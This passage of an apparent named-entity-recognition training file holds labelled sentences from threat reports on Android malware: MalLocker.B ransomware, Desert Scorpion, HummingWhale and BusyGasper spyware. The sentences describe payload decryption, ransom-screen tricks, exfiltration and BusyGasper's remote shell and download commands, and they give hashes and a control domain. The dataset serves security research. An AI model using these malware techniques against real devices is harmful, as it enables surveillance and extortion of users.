3a15e7b8f4e35e006329811a6a2bf291d449884a120332f24c7e3ca58d0fbbdb IOS_ProjectSpy.A URLs cashnow [ .", 
"spans": {}, "info": {"id": "cyner_train_000431", "source": "cyner_train"}} {"text": "] ee Backend server ftp [ .", "spans": {}, "info": {"id": "cyner_train_000432", "source": "cyner_train"}} {"text": "] ee Backend server October 8 , 2020 Sophisticated new Android malware marks the latest evolution of mobile ransomware Attackers are persistent and motivated to continuously evolve – and no platform is immune .", "spans": {"SYSTEM: Android": [[55, 62]]}, "info": {"id": "cyner_train_000438", "source": "cyner_train"}} {"text": "That is why Microsoft has been working to extend its industry-leading endpoint protection capabilities beyond Windows .", "spans": {"ORGANIZATION: Microsoft": [[12, 21]], "SYSTEM: Windows": [[110, 117]]}, "info": {"id": "cyner_train_000439", "source": "cyner_train"}} {"text": "Microsoft ’ s mobile threat defense capabilities further enrich the visibility that organizations have on threats in their networks , as well as provide more tools to detect and respond to threats across domains and across platforms .", "spans": {"ORGANIZATION: Microsoft": [[0, 9]]}, "info": {"id": "cyner_train_000441", "source": "cyner_train"}} {"text": "Like all of Microsoft ’ s security solutions , these new capabilities are likewise backed by a global network of threat researchers and security experts whose deep understanding of the threat landscape guide the continuous innovation of security features and ensure that customers are protected from ever-evolving threats .", "spans": {"ORGANIZATION: Microsoft": [[12, 21]]}, "info": {"id": "cyner_train_000442", "source": "cyner_train"}} {"text": "For example , we found a piece of a particularly sophisticated Android ransomware with novel techniques and behavior , exemplifying the rapid evolution of mobile threats that we have also observed on other platforms .", "spans": {"SYSTEM: Android": [[63, 70]]}, "info": {"id": "cyner_train_000443", "source": "cyner_train"}} {"text": "This ransomware family is known for being hosted 
on arbitrary websites and circulated on online forums using various social engineering lures , including masquerading as popular apps , cracked games , or video players .", "spans": {}, "info": {"id": "cyner_train_000445", "source": "cyner_train"}} {"text": "Instead , it blocks access to devices by displaying a screen that appears over every other window , such that the user can ’ t do anything else .", "spans": {}, "info": {"id": "cyner_train_000448", "source": "cyner_train"}} {"text": "What ’ s innovative about this ransomware is how it displays its ransom note .", "spans": {}, "info": {"id": "cyner_train_000450", "source": "cyner_train"}} {"text": "New scheme , same goal In the past , Android ransomware used a special permission called “ SYSTEM_ALERT_WINDOW ” to display their ransom note .", "spans": {"SYSTEM: Android": [[37, 44]]}, "info": {"id": "cyner_train_000452", "source": "cyner_train"}} {"text": "Apps that have this permission can draw a window that belongs to the system group and can ’ t be dismissed .", "spans": {}, "info": {"id": "cyner_train_000453", "source": "cyner_train"}} {"text": "The notification was intended to be used for system alerts or errors , but Android threats misused it to force the attacker-controlled UI to fully occupy the screen , blocking access to the device .", "spans": {"SYSTEM: Android": [[75, 82]]}, "info": {"id": "cyner_train_000455", "source": "cyner_train"}} {"text": "Attackers create this scenario to persuade users to pay the ransom so they can gain back access to the device .", "spans": {}, "info": {"id": "cyner_train_000456", "source": "cyner_train"}} {"text": "To catch these threats , security solutions used heuristics that focused on detecting this behavior .", "spans": {}, "info": {"id": "cyner_train_000457", "source": "cyner_train"}} {"text": "Google later implemented platform-level changes that practically eliminated this attack surface .", "spans": {"ORGANIZATION: Google": [[0, 6]]}, "info": {"id": 
"cyner_train_000458", "source": "cyner_train"}} {"text": "These changes include : Removing the SYSTEM_ALERT_WINDOW error and alert window types , and introducing a few other types as replacement Elevating the permission status of SYSTEM_ALERT_WINDOW to special permission by putting it into the “ above dangerous ” category , which means that users have to go through many screens to approve apps that ask for permission , instead of just one click Introducing an overlay kill switch on Android 8.0 and later that users can activate anytime to deactivate a system alert window To adapt , Android malware evolved to misusing", "spans": {"SYSTEM: Android 8.0": [[429, 440]], "SYSTEM: Android": [[530, 537]]}, "info": {"id": "cyner_train_000459", "source": "cyner_train"}} {"text": "other features , but these aren ’ t as effective .", "spans": {}, "info": {"id": "cyner_train_000460", "source": "cyner_train"}} {"text": "Other ransomware families use infinite loops of drawing non-system windows , but in between drawing and redrawing , it ’ s possible for users to go to settings and uninstall the offending app .", "spans": {"SYSTEM: windows": [[67, 74]]}, "info": {"id": "cyner_train_000462", "source": "cyner_train"}} {"text": "The new Android ransomware variant overcomes these barriers by evolving further than any Android malware we ’ ve seen before .", "spans": {"MALWARE: Android": [[8, 15], [89, 96]]}, "info": {"id": "cyner_train_000463", "source": "cyner_train"}} {"text": "To surface its ransom note , it uses a series of techniques that take advantage of the following components on Android : The “ call ” notification , among several categories of notifications that Android supports , which requires immediate user attention .", "spans": {"SYSTEM: Android": [[111, 118], [196, 203]]}, "info": {"id": "cyner_train_000464", "source": "cyner_train"}} {"text": "The “ onUserLeaveHint ( ) ” callback method of the Android Activity ( i.e. 
, the typical GUI screen the user sees ) is called as part of the activity lifecycle when the activity is about to go into the background as a result of user choice , for example , when the user presses the Home key .", "spans": {"SYSTEM: Android Activity": [[51, 67]]}, "info": {"id": "cyner_train_000465", "source": "cyner_train"}} {"text": "The malware connects the dots and uses these two components to create a special type of notification that triggers the ransom screen via the callback .", "spans": {}, "info": {"id": "cyner_train_000466", "source": "cyner_train"}} {"text": "As the code snippet shows , the malware creates a notification builder and then does the following : setCategory ( “ call ” ) – This means that the notification is built as a very important notification that needs special privilege .", "spans": {}, "info": {"id": "cyner_train_000467", "source": "cyner_train"}} {"text": "At this stage , half the job is done for the malware .", "spans": {}, "info": {"id": "cyner_train_000469", "source": "cyner_train"}} {"text": "Recall that the malware hooked the RansomActivity intent with the notification that was created as a “ call ” type notification .", "spans": {}, "info": {"id": "cyner_train_000472", "source": "cyner_train"}} {"text": "This creates a chain of events that triggers the automatic pop-up of the ransomware screen without doing infinite redraw or posing as system window .", "spans": {}, "info": {"id": "cyner_train_000473", "source": "cyner_train"}} {"text": "The knowledge graph below shows the various techniques this ransomware family has been seen using , including abusing the system alert window , abusing accessibility features , and , more recently , abusing notification services .", "spans": {}, "info": {"id": "cyner_train_000475", "source": "cyner_train"}} {"text": "This ransomware family ’ s long history tells us that its evolution is far from over .", "spans": {}, "info": {"id": "cyner_train_000476", "source": "cyner_train"}} {"text": 
"The frozen TinyML model is useful for making sure images fit the screen without distortion .", "spans": {"SYSTEM: TinyML": [[11, 17]]}, "info": {"id": "cyner_train_000479", "source": "cyner_train"}} {"text": "In the case of this ransomware , using the model would ensure that its ransom note—typically fake police notice or explicit images supposedly found on the device—would appear less contrived and more believable , increasing the chances of the user paying for the ransom .", "spans": {}, "info": {"id": "cyner_train_000480", "source": "cyner_train"}} {"text": "The library that uses tinyML is not yet wired to the malware ’ s functionalities , but its presence in the malware code indicates the intention to do so in future variants .", "spans": {"SYSTEM: tinyML": [[22, 28]]}, "info": {"id": "cyner_train_000481", "source": "cyner_train"}} {"text": "This new mobile ransomware variant is an important discovery because the malware exhibits behaviors that have not been seen before and could open doors for other malware to follow .", "spans": {}, "info": {"id": "cyner_train_000484", "source": "cyner_train"}} {"text": "It reinforces the need for comprehensive defense powered by broad visibility into attack surfaces as well as domain experts who track the threat landscape and uncover notable threats that might be hiding amidst massive threat data and signals .", "spans": {}, "info": {"id": "cyner_train_000485", "source": "cyner_train"}} {"text": "It detects this ransomware ( AndroidOS/MalLocker.B ) , as well as other malicious apps and files using cloud-based protection powered by deep learning and heuristics , in addition to content-based detection .", "spans": {}, "info": {"id": "cyner_train_000487", "source": "cyner_train"}} {"text": "Threat data from endpoints are combined with signals from email and data , identities , and apps in Microsoft 365 Defender ( previously Microsoft Threat Protection ) , which orchestrates detection , prevention , investigation , and response 
across domains , providing coordinated defense .", "spans": {"SYSTEM: Microsoft 365 Defender": [[100, 122]], "SYSTEM: Microsoft Threat Protection": [[136, 163]]}, "info": {"id": "cyner_train_000491", "source": "cyner_train"}} {"text": "Microsoft Defender for Endpoint on Android further enriches organizations ’ visibility into malicious activity , empowering them to comprehensively prevent , detect , and respond to attack sprawl and cross-domain incidents .", "spans": {"SYSTEM: Microsoft Defender": [[0, 18]], "SYSTEM: Android": [[35, 42]]}, "info": {"id": "cyner_train_000492", "source": "cyner_train"}} {"text": "Technical analysis Obfuscation On top of recreating ransomware behavior in ways we haven ’ t seen before , the Android malware variant uses a new obfuscation technique unique to the Android platform .", "spans": {"SYSTEM: Android": [[111, 118], [182, 189]]}, "info": {"id": "cyner_train_000493", "source": "cyner_train"}} {"text": "How does the malware work without code for these key components ?", "spans": {}, "info": {"id": "cyner_train_000496", "source": "cyner_train"}} {"text": "As is characteristic for obfuscated threats , the malware has encrypted binary code stored in the Assets folder : When the malware runs for the first time , the static block of the main class is run .", "spans": {}, "info": {"id": "cyner_train_000497", "source": "cyner_train"}} {"text": "On Android , an Intent is a software mechanism that allows users to coordinate the functions of different Activities to achieve a task .", "spans": {"SYSTEM: Android": [[3, 10]]}, "info": {"id": "cyner_train_000499", "source": "cyner_train"}} {"text": "It ’ s a messaging object that can be used to request an action from another app component .", "spans": {}, "info": {"id": "cyner_train_000500", "source": "cyner_train"}} {"text": "The Intent object carries a string value as “ action ” parameter .", "spans": {}, "info": {"id": "cyner_train_000501", "source": "cyner_train"}} {"text": "It then 
decrypts a hardcoded encrypted value and sets the “ action ” parameter of the Intent using the setAction API .", "spans": {}, "info": {"id": "cyner_train_000503", "source": "cyner_train"}} {"text": "Once this Intent object is generated with the action value pointing to the decrypted content , the decryption function returns the Intent object to the callee .", "spans": {}, "info": {"id": "cyner_train_000504", "source": "cyner_train"}} {"text": "Payload deployment Once the static block execution is complete , the Android Lifecycle callback transfers the control to the OnCreate method of the main class .", "spans": {"SYSTEM: Android Lifecycle": [[69, 86]]}, "info": {"id": "cyner_train_000506", "source": "cyner_train"}} {"text": "Malware code showing onCreate method Figure 9. onCreate method of the main class decrypting the payload Next , the malware-defined function decryptAssetToDex ( a meaningful name we assigned during analysis ) receives the string “ CuffGmrQRT ” as the first argument , which is the name of the encrypted file stored in the Assets folder .", "spans": {}, "info": {"id": "cyner_train_000507", "source": "cyner_train"}} {"text": "This is a notable behavior that is characteristic of this ransomware family .", "spans": {}, "info": {"id": "cyner_train_000510", "source": "cyner_train"}} {"text": "Comparison of code of Asset file before and after decryption Figure 11 .", "spans": {}, "info": {"id": "cyner_train_000511", "source": "cyner_train"}} {"text": "Asset file before and after decryption Once the encrypted executable is decrypted and dropped in the storage , the malware has the definitions for all the components it declared in the manifest file .", "spans": {}, "info": {"id": "cyner_train_000512", "source": "cyner_train"}} {"text": "It then starts the final detonator function to load the dropped .dex file into memory and triggers the main payload .", "spans": {}, "info": {"id": "cyner_train_000513", "source": "cyner_train"}} {"text": "Malware code 
showing loading of decrypted dex file Figure 12 .", "spans": {}, "info": {"id": "cyner_train_000514", "source": "cyner_train"}} {"text": "Loading the decrypted .dex file into memory and triggering the main payload Main payload When the main payload is loaded into memory , the initial detonator hands over the control to the main payload by invoking the method XoqF ( which we renamed to triggerInfection during analysis ) from the gvmthHtyN class ( renamed to PayloadEntry ) .", "spans": {}, "info": {"id": "cyner_train_000515", "source": "cyner_train"}} {"text": "Malware code showing handover from initial module to main payload Figure 13 .", "spans": {}, "info": {"id": "cyner_train_000516", "source": "cyner_train"}} {"text": "Handover from initial module to the main payload As mentioned , the initial handover component called triggerInfection with an instance of appObj and a method that returns the value for the variable config .", "spans": {}, "info": {"id": "cyner_train_000517", "source": "cyner_train"}} {"text": "Definition of populateConfigMap , which loads the map with values Correlating the last two steps , one can observe that the malware payload receives the configuration for the following properties : number – The default number to be sent to the server ( in case the number is not available from the device ) api – The API key url – The URL to be used in WebView to display on the ransom note The malware saves this configuration to the shared preferences of the app data and then it sets up all the Broadcast Receivers .", "spans": {}, "info": {"id": "cyner_train_000519", "source": "cyner_train"}} {"text": "This action registers code components to get notified when certain system events happen .", "spans": {}, "info": {"id": "cyner_train_000520", "source": "cyner_train"}} {"text": "Initializing the BroadcastReceiver against system events From this point on , the malware execution is driven by callback functions that are triggered on system events like connectivity 
change , unlocking the phone , elapsed time interval , and others .", "spans": {}, "info": {"id": "cyner_train_000523", "source": "cyner_train"}} {"text": "Lookout researchers have identified a new , highly targeted surveillanceware family known as Desert Scorpion in the Google Play Store .", "spans": {"ORGANIZATION: Lookout": [[0, 7]], "MALWARE: Desert Scorpion": [[93, 108]], "SYSTEM: Google Play Store": [[116, 133]]}, "info": {"id": "cyner_train_000524", "source": "cyner_train"}} {"text": "Lookout notified Google of the finding and Google removed the app immediately while also taking action on it in Google Play Protect .", "spans": {"ORGANIZATION: Lookout": [[0, 7]], "ORGANIZATION: Google": [[17, 23], [43, 49]], "SYSTEM: Google Play Protect": [[112, 131]]}, "info": {"id": "cyner_train_000525", "source": "cyner_train"}} {"text": "The app ties together two malware families - Desert Scorpion and another targeted surveillanceware family named FrozenCell - that we believe are being developed by a single , evolving surveillanceware actor called APT-C-23 targeting individuals in the Middle East .", "spans": {"MALWARE: Desert Scorpion": [[45, 60]], "MALWARE: FrozenCell": [[112, 122]], "MALWARE: APT-C-23": [[214, 222]]}, "info": {"id": "cyner_train_000526", "source": "cyner_train"}} {"text": "We 've seen this actor rely heavily on phishing campaigns to trick victims into downloading their malicious apps , specifically on Facebook .", "spans": {"SYSTEM: Facebook": [[131, 139]]}, "info": {"id": "cyner_train_000527", "source": "cyner_train"}} {"text": "Even sophisticated actors are using lower cost , less technologically impressive means like phishing to spread their malware because it 's cheap and very effective , especially on mobile devices where there are more ways to interact with a victim ( messaging apps , social media apps , etc .", "spans": {}, "info": {"id": "cyner_train_000528", "source": "cyner_train"}} {"text": ") , and less screen real estate for victims to 
identify potential indicators of a threat .", "spans": {}, "info": {"id": "cyner_train_000529", "source": "cyner_train"}} {"text": "Lookout customers are protected against this threat and additionally we have included a list of IOCs at the end of this report .", "spans": {"ORGANIZATION: Lookout": [[0, 7]]}, "info": {"id": "cyner_train_000530", "source": "cyner_train"}} {"text": "These factors , in combination with the fact that the command and control infrastructure used by Frozen Cell and Desert Scorpion resides in similar IP blocks , supports the theory that the same actor is responsible for operating , if not developing , both families .", "spans": {"MALWARE: Frozen Cell": [[97, 108]], "MALWARE: Desert Scorpion": [[113, 128]]}, "info": {"id": "cyner_train_000534", "source": "cyner_train"}} {"text": "The chat application acts as a dropper for this second-stage payload app .", "spans": {}, "info": {"id": "cyner_train_000536", "source": "cyner_train"}} {"text": "At the time of writing Lookout has observed two updates to the Dardesh application , the first on February 26 and the second on March 28 .", "spans": {"ORGANIZATION: Lookout": [[23, 30]], "MALWARE: Dardesh": [[63, 70]]}, "info": {"id": "cyner_train_000537", "source": "cyner_train"}} {"text": "The malicious capabilities observed in the second stage include the following : Upload attacker-specified files to C2 servers Get list of installed applications Get device metadata Inspect itself to get a list of launchable activities Retrieves PDF , txt , doc , xls , xlsx , ppt , pptx files found on external storage Send SMS Retrieve text messages Track device location Handle limited attacker commands via out of band text messages Record surrounding audio Record calls Record video Retrieve account information such as email addresses Retrieve contacts Removes copies of itself if", "spans": {}, "info": {"id": "cyner_train_000538", "source": "cyner_train"}} {"text": "any additional APKs are downloaded to external storage 
.", "spans": {}, "info": {"id": "cyner_train_000539", "source": "cyner_train"}} {"text": "Call an attacker-specified number Uninstall apps Check if a device is rooted Hide its icon Retrieve list of files on external storage If running on a Huawei device it will attempt to add itself to the protected list of apps able to run with the screen off Encrypts some exfiltrated data Desert Scorpion 's second stage masquerades as a generic \" settings '' application .", "spans": {"MALWARE: Desert Scorpion": [[287, 302]]}, "info": {"id": "cyner_train_000540", "source": "cyner_train"}} {"text": "Such references would be in line with FrozenCell 's phishing tactics in which they used file names to lure people associated with the political party to open malicious documents .", "spans": {"MALWARE: FrozenCell": [[38, 48]]}, "info": {"id": "cyner_train_000542", "source": "cyner_train"}} {"text": "Desert Scorpion 's second stage is capable of installing another non-malicious application ( included in the second stage ) which is highly specific to the Fatah political party and supports the targeting theory .", "spans": {"MALWARE: Desert Scorpion": [[0, 15]], "ORGANIZATION: Fatah": [[156, 161]]}, "info": {"id": "cyner_train_000543", "source": "cyner_train"}} {"text": "The Lookout Threat Intelligence team is increasingly seeing the same tradecraft , tactics , and procedures that APT-C-23 favors being used by other actors .", "spans": {"ORGANIZATION: Lookout Threat Intelligence": [[4, 31]], "MALWARE: APT-C-23": [[112, 120]]}, "info": {"id": "cyner_train_000544", "source": "cyner_train"}} {"text": "The approach of separating malicious functionality out into separate stages that are later downloaded during execution and not present in the initial app published to the Google Play Store , combined with social engineering delivered via social media platforms like Facebook , requires minimal investment in comparison to premium tooling like Pegasus or FinFisher .", "spans": {"SYSTEM: Google 
Play Store": [[171, 188]], "ORGANIZATION: Facebook": [[266, 274]], "MALWARE: Pegasus": [[343, 350]], "MALWARE: FinFisher": [[354, 363]]}, "info": {"id": "cyner_train_000545", "source": "cyner_train"}} {"text": "As we 've seen with actors like Dark Caracal , this low cost , low sophistication approach that relies heavily upon social engineering has still been shown to be highly successful for those operating such campaigns .", "spans": {"MALWARE: Dark Caracal": [[32, 44]]}, "info": {"id": "cyner_train_000546", "source": "cyner_train"}} {"text": "Given previous operational security errors from this actor in the past which resulted in exfiltrated content being publicly accessible Lookout Threat Intelligence is continuing to map out infrastructure and closely monitor their continued evolution .", "spans": {"ORGANIZATION: Lookout Threat Intelligence": [[135, 162]]}, "info": {"id": "cyner_train_000547", "source": "cyner_train"}} {"text": "Virulent Android malware returns , gets > 2 million downloads on Google Play HummingWhale is back with new tricks , including a way to gin user ratings .", "spans": {"MALWARE: Virulent": [[0, 8]], "SYSTEM: Android": [[9, 16]], "SYSTEM: Google Play": [[65, 76]], "MALWARE: HummingWhale": [[77, 89]]}, "info": {"id": "cyner_train_000548", "source": "cyner_train"}} {"text": "DAN GOODIN - 1/23/2017 , 4:39 PM A virulent family of malware that infected more than 10 million Android devices last year has made a comeback , this time hiding inside Google Play apps that have been downloaded by as many as 12 million unsuspecting users .", "spans": {"MALWARE: virulent": [[35, 43]], "SYSTEM: Android": [[97, 104]], "SYSTEM: Google Play": [[169, 180]]}, "info": {"id": "cyner_train_000549", "source": "cyner_train"}} {"text": "HummingBad attempted to override security protections by exploiting unpatched vulnerabilities that gave the malware root privileges in older versions of Android .", "spans": {"MALWARE: HummingBad": [[0, 10]], "VULNERABILITY: 
unpatched vulnerabilities": [[68, 93]], "SYSTEM: Android": [[153, 160]]}, "info": {"id": "cyner_train_000551", "source": "cyner_train"}} {"text": "Before Google shut it down , it installed more than 50,000 fraudulent apps each day , displayed 20 million malicious advertisements , and generated more than $ 300,000 per month in revenue .", "spans": {"ORGANIZATION: Google": [[7, 13]]}, "info": {"id": "cyner_train_000552", "source": "cyner_train"}} {"text": "HummingWhale , by contrast , managed to sneak its way into about 20 Google Play apps that were downloaded from 2 million to 12 million times , according to researchers from Check Point , the security company that has been closely following the malware family for almost a year .", "spans": {"MALWARE: HummingWhale": [[0, 12]], "SYSTEM: Google Play": [[68, 79]], "ORGANIZATION: Check Point": [[173, 184]]}, "info": {"id": "cyner_train_000554", "source": "cyner_train"}} {"text": "\" This malware employs several tactics to keep its activity hidden , meaning users might be unaware of its existence on their device .", "spans": {}, "info": {"id": "cyner_train_000557", "source": "cyner_train"}} {"text": "'' As was the case with HummingBad , the purpose of HummingWhale is to generate revenue by displaying fraudulent ads and automatically installing apps .", "spans": {"MALWARE: HummingBad": [[24, 34]], "MALWARE: HummingWhale": [[52, 64]]}, "info": {"id": "cyner_train_000558", "source": "cyner_train"}} {"text": "When users try to close the ads , the new functionality causes already downloaded apps to run in a virtual machine .", "spans": {}, "info": {"id": "cyner_train_000559", "source": "cyner_train"}} {"text": "That creates a fake ID that allows the perpetrators to generate referral revenues .", "spans": {}, "info": {"id": "cyner_train_000560", "source": "cyner_train"}} {"text": "Advertisement The VM also disguises the malicious activity , making it easier for the apps to infiltrate Google Play .", "spans": {"SYSTEM: Google 
Play": [[105, 116]]}, "info": {"id": "cyner_train_000562", "source": "cyner_train"}} {"text": "Until now , Android malware that wanted advanced capabilities typically had to trick users into approving sometimes scary-sounding permissions or exploit rooting vulnerabilities .", "spans": {"SYSTEM: Android": [[12, 19]]}, "info": {"id": "cyner_train_000564", "source": "cyner_train"}} {"text": "Gooligan , a family of Android malware that came to light in November after it compromised more than 1 million Google accounts , contained similar abilities to tamper with Google Play ratings .", "spans": {"MALWARE: Gooligan": [[0, 8]], "SYSTEM: Android": [[23, 30]], "ORGANIZATION: Google": [[111, 117]], "SYSTEM: Google Play": [[172, 183]]}, "info": {"id": "cyner_train_000567", "source": "cyner_train"}} {"text": "People who want to know if their Android devices are infected can download the Check Point app here .", "spans": {"SYSTEM: Android": [[33, 40]], "ORGANIZATION: Check Point": [[79, 90]]}, "info": {"id": "cyner_train_000568", "source": "cyner_train"}} {"text": "A separate app from Check Point competitor Lookout also detects the threat as a variant of the Shedun malware family .", "spans": {"ORGANIZATION: Check Point": [[20, 31]], "ORGANIZATION: Lookout": [[43, 50]], "MALWARE: Shedun": [[95, 101]]}, "info": {"id": "cyner_train_000569", "source": "cyner_train"}} {"text": "More technically inclined people can detect infections by seeing if a device connects to a control server located at app.blinkingcamera.com .", "spans": {}, "info": {"id": "cyner_train_000570", "source": "cyner_train"}} {"text": "Package names for infected apps typically contain a common naming structure that includes com.XXXXXXXXX.camera , for example com.bird.sky.whale.camera ( app name : Whale Camera ) , com.color.rainbow.camera ( Rainbow Camera ) , and com.fishing.when.orangecamera ( Orange Camera ) .", "spans": {"SYSTEM: Whale Camera": [[164, 176]], "SYSTEM: Rainbow Camera": [[208, 222]], "SYSTEM: 
Orange Camera": [[263, 276]]}, "info": {"id": "cyner_train_000571", "source": "cyner_train"}} {"text": "BusyGasper – the unfriendly spy 29 AUG 2018 In early 2018 our mobile intruder-detection technology was triggered by a suspicious Android sample that , as it turned out , belonged to an unknown spyware family .", "spans": {"MALWARE: BusyGasper": [[0, 10]], "SYSTEM: Android": [[129, 136]]}, "info": {"id": "cyner_train_000574", "source": "cyner_train"}} {"text": "Further investigation showed that the malware , which we named BusyGasper , is not all that sophisticated , but demonstrates some unusual features for this type of threat .", "spans": {"MALWARE: BusyGasper": [[63, 73]]}, "info": {"id": "cyner_train_000575", "source": "cyner_train"}} {"text": "From a technical point of view , the sample is a unique spy implant with stand-out features such as device sensors listeners , including motion detectors that have been implemented with a degree of originality .", "spans": {}, "info": {"id": "cyner_train_000576", "source": "cyner_train"}} {"text": "As a modern Android spyware it is also capable of exfiltrating data from messaging applications ( WhatsApp , Viber , Facebook ) .", "spans": {"SYSTEM: WhatsApp": [[98, 106]], "SYSTEM: Viber": [[109, 114]], "SYSTEM: Facebook": [[117, 125]]}, "info": {"id": "cyner_train_000578", "source": "cyner_train"}} {"text": "Moreover , BusyGasper boasts some keylogging tools – the malware processes every user tap , gathering its coordinates and calculating characters by matching given values with hardcoded ones .", "spans": {"MALWARE: BusyGasper": [[11, 21]]}, "info": {"id": "cyner_train_000579", "source": "cyner_train"}} {"text": "The sample has a multicomponent structure and can download a payload or updates from its C & C server , which happens to be an FTP server belonging to the free Russian web hosting service Ucoz .", "spans": {}, "info": {"id": "cyner_train_000580", "source": "cyner_train"}} {"text": "It is noteworthy that 
BusyGasper supports the IRC protocol which is rarely seen among Android malware .", "spans": {"MALWARE: BusyGasper": [[22, 32]], "SYSTEM: Android": [[86, 93]]}, "info": {"id": "cyner_train_000581", "source": "cyner_train"}} {"text": "In addition , the malware can log in to the attacker ’ s email inbox , parse emails in a special folder for commands and save any payloads to a device from email attachments .", "spans": {}, "info": {"id": "cyner_train_000582", "source": "cyner_train"}} {"text": "This particular operation has been active since approximately May 2016 up to the present time .", "spans": {}, "info": {"id": "cyner_train_000583", "source": "cyner_train"}} {"text": "Intrigued , we continued our search and found more interesting clues that could reveal some detailed information about the owners of the infected devices .", "spans": {}, "info": {"id": "cyner_train_000587", "source": "cyner_train"}} {"text": "As we know from the FTP dump analysis , there was a firmware component from ASUS firmware , indicating the attacker ’ s interest in ASUS devices , which explains the victim file name that mentions “ ASUS ” .", "spans": {"ORGANIZATION: ASUS": [[76, 80], [132, 136]]}, "info": {"id": "cyner_train_000589", "source": "cyner_train"}} {"text": "Gathered file Type Description lock Text Implant log ldata sqlite3 Location data based on network ( cell_id ) gdata sqlite3 Location data based on GPS coordinates sdata sqlite3 SMS messages f.db sqlite3 Facebook messages v.db sqlite3 Viber messages w.db sqlite3 WhatsApp messages Among the other data gathered were SMS banking messages that revealed an account with a balance of more than US $ 10,000.But as far as we know , the attacker behind this campaign is not interested in stealing the victims ’ money", "spans": {"SYSTEM: Facebook": [[203, 211]], "SYSTEM: Viber": [[234, 239]], "SYSTEM: WhatsApp": [[262, 270]]}, "info": {"id": "cyner_train_000591", "source": "cyner_train"}} {"text": "We found no similarities to commercial 
spyware products or to other known spyware variants , which suggests BusyGasper is self-developed and used by a single threat actor .", "spans": {"MALWARE: BusyGasper": [[108, 118]]}, "info": {"id": "cyner_train_000593", "source": "cyner_train"}} {"text": "At the same time , the lack of encryption , use of a public FTP server and the low opsec level could indicate that less skilled attackers are behind the malware .", "spans": {}, "info": {"id": "cyner_train_000594", "source": "cyner_train"}} {"text": "Technical details Here is the meta information for the observed samples , certificates and hardcoded version stamps : Certificate MD5 Module Version Serial Number : 0x76607c02 Issuer : CN=Ron Validity : from = Tue Aug 30 13:01:30 MSK 2016 to = Sat Aug 24 13:01:30 MSK 2041 Subject : CN=Ron 9e005144ea1a583531f86663a5f14607 1 – 18abe28730c53de6d9e4786c7765c3d8 2 2.0", "spans": {}, "info": {"id": "cyner_train_000595", "source": "cyner_train"}} {"text": "Serial Number : 0x6a0d1fec Issuer : CN=Sun Validity : from = Mon May 16 17:42:40 MSK 2016 to = Fri May 10 17:42:40 MSK 2041 Subject : CN=Sun 9ffc350ef94ef840728564846f2802b0 2 v2.51sun 6c246bbb40b7c6e75c60a55c0da9e2f2 2 v2.96s 7c8a12e56e3e03938788b26b84b80bd6 2 v3.09s", "spans": {}, "info": {"id": "cyner_train_000596", "source": "cyner_train"}} {"text": "bde7847487125084f9e03f2b6b05adc3 2 v3.12s 2560942bb50ee6e6f55afc495d238a12 2 v3.18s It ’ s interesting that the issuer “ Sun ” matches the “ Sun1 ” and “ Sun2 ” identifiers of infected devices from the FTP server , suggesting they may be test devices .", "spans": {}, "info": {"id": "cyner_train_000597", "source": "cyner_train"}} {"text": "The analyzed implant has a complex structure , and for now we have observed two modules .", "spans": {}, "info": {"id": "cyner_train_000598", "source": "cyner_train"}} {"text": "First ( start ) module The first module , which was installed on the targeted device , could be controlled over the IRC protocol and enable deployment of other 
components by downloading a payload from the FTP server : @ install command As can be seen from the screenshot above , a new component was copied in the system path , though that sort of operation is impossible without root privileges .", "spans": {}, "info": {"id": "cyner_train_000599", "source": "cyner_train"}} {"text": "At the time of writing we had no evidence of an exploit being used to obtain root privileges , though it is possible that the attackers used some unseen component to implement this feature .", "spans": {}, "info": {"id": "cyner_train_000600", "source": "cyner_train"}} {"text": "Here is a full list of possible commands that can be executed by the first module : Command name Description @ stop Stop IRC @ quit System.exit ( 0 ) @ start Start IRC @ server Set IRC server ( default value is “ irc.freenode.net ” ) , port is always 6667 @ boss Set IRC command and control nickname ( default value is “ ISeency ” ) @ nick Set IRC client nickname @ screen Report every time when screen is on ( enable/disable ) @ root Use root features ( enable/disable ) @ timer Set", "spans": {}, "info": {"id": "cyner_train_000601", "source": "cyner_train"}} {"text": "period of IRCService start @ hide Hide implant icon @ unhide Unhide implant icon @ run Execute specified shell @ broadcast Send command to the second module @ echo Write specified message to log @ install Download and copy specified component to the system path The implant uses a complex intent-based communication mechanism between its components to broadcast commands : Approximate graph of relationships between BusyGasper components Second ( main ) module This module writes a log of the command execution history to the file named “ lock ” , which is later exfiltrated", "spans": {}, "info": {"id": "cyner_train_000602", "source": "cyner_train"}} {"text": "A full list of all possible commands with descriptions can be found in Appendix II below .", "spans": {}, "info": {"id": "cyner_train_000607", "source": 
"cyner_train"}} {"text": "The malware has all the popular capabilities of modern spyware .", "spans": {}, "info": {"id": "cyner_train_000608", "source": "cyner_train"}} {"text": "Below is a description of the most noteworthy : The implant is able to spy on all available device sensors and to log registered events .", "spans": {}, "info": {"id": "cyner_train_000609", "source": "cyner_train"}} {"text": "This allows it to silently execute any backdoor activity without the user knowing that the device is in an active state .", "spans": {}, "info": {"id": "cyner_train_000611", "source": "cyner_train"}} {"text": "As soon as the user picks up the device , the implant will detect a motion event and execute the “ tk1 ” and “ input keyevent 3 ” commands .", "spans": {}, "info": {"id": "cyner_train_000612", "source": "cyner_train"}} {"text": "“ tk1 ” will disable all the effects of the “ tk0 ” command , while “ input keyevent 3 ” is the shell command that simulates the pressing of the ‘ home ’ button so all the current activities will be minimized and the user won ’ t suspect anything .", "spans": {}, "info": {"id": "cyner_train_000613", "source": "cyner_train"}} {"text": "The implant can log in to the attackers email inbox , parse emails for commands in a special “ Cmd ” folder and save any payloads to a device from email attachments .", "spans": {}, "info": {"id": "cyner_train_000615", "source": "cyner_train"}} {"text": "Accessing the “ Cmd ” folder in the attacker ’ s email box Moreover , it can send a specified file or all the gathered data from the victim device via email .", "spans": {}, "info": {"id": "cyner_train_000616", "source": "cyner_train"}} {"text": "Emergency SMS commands .", "spans": {}, "info": {"id": "cyner_train_000617", "source": "cyner_train"}} {"text": "Interestingly , there is an allowlist of tapped activities : ui.ConversationActivity ui.ConversationListActivity SemcInCallScreen Quadrapop SocialPhonebookActivity The listener can operate with only 
